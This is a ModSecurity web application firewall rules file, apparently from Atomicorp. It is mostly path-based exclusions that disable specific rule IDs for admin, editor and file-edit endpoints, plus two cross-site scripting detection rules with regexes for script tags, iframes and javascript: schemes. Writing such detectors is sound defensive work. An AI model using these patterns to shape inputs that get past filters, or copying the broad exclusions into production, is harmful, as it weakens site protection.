SecRule REQUEST_FILENAME "/ajax\.process\.php" "phase:2,id:92469,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/sienna\.php" "phase:2,id:92470,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/sadmin/index\.php" "phase:2,id:92471,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/ajax_calls/updateletter\.php" "phase:2,id:92472,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cgi-bin/editfile\.cgi" "phase:2,id:92473,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sendmail\.php" "phase:2,id:92474,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ajaxemail" "phase:2,id:92475,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin-db-create-table-census-load\.php" "phase:2,id:92476,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340157"

SecRule REQUEST_FILENAME "/updateorder\.php" "phase:2,id:92477,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/awesome-gallery/resize\.php" "phase:2,id:92478,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/report\.php" "phase:2,id:92479,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/addvesti\.php" "phase:2,id:92480,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "email-templates\.php" "phase:2,id:92481,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cornerstone-endpoint" "phase:2,id:92482,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/fileman_file_edit\.php" "phase:2,id:92483,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/inc/e_product\.php" "phase:2,id:92484,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/configurator\.do" "phase:2,id:92485,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/supporttickets\.php" "phase:2,id:92486,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92487,t:none,pass,nolog,skipAfter:END_RULES_92487"

SecRule ARGS|ARGS_NAMES|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:message|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:compressWhitespace,t:lowercase,capture,id:390147,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS_NAMES|!ARGS:message|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:/^dbem/!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/option_tree/|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/_head_/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:sotenson|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:/keycaptcha_code/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:analyticscode|!ARGS:top_news|!ARGS:tracking_code|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:whats-new|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/^field_/|!ARGS:match_report|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:/^instance/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?script|< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|document\.write ?\(|(?:<|< ?/) ?(?:(?:java|vb)script|applet|activex|chrome)|< ?/?i?frame|\% ?env)"          "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,multiMatch,id:390148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"

SecMarker END_RULES_92487

SecRule REQUEST_FILENAME "/api/podapi/" "phase:2,id:92488,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/templatesavechanges" "phase:2,id:92489,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340835,ctl:ruleRemovebyID=340836,ctl:ruleRemovebyID=340837"

SecRule REQUEST_FILENAME "accordioncheckout\.do" "phase:2,id:92490,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "accordion\.do" "phase:2,id:92491,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/formbuilder/index/submit" "phase:2,id:92492,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin-exec\.php" "phase:2,id:92493,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/press-this\.php" "phase:2,id:92494,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/includes/apps/ajax_func\.php" "phase:2,id:92495,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/pw/page/edit/" "phase:2,id:92496,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/bitrix/tools/autosave\.php" "phase:2,id:92497,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/bitrix/tools/public_file_edit_src\.php" "phase:2,id:92498,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/bitrix/admin/fileman_file_edit\.php" "phase:2,id:92499,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/manage/faq/edit/" "phase:2,id:92500,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/engine/update\.php" "phase:2,id:92501,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/manager/ispmgr" "phase:2,id:92502,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/amember/aff/click-js/" "phase:2,id:92503,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/manage/seo/" "phase:2,id:92504,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/admin/admin-data\.php" "phase:2,id:92505,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/edit_interface\.php" "phase:2,id:92506,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/portal/policies-exec\.php" "phase:2,id:92507,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/php/successjunction\.php" "phase:2,id:92508,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/test/addquestion/" "phase:2,id:92509,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/clientsdomainreg\.php" "phase:2,id:92510,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/profiles\.php" "phase:2,id:92511,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/configdomains\.php" "phase:2,id:92512,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/plugins/moxiemanager/api\.php" "phase:2,id:92513,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

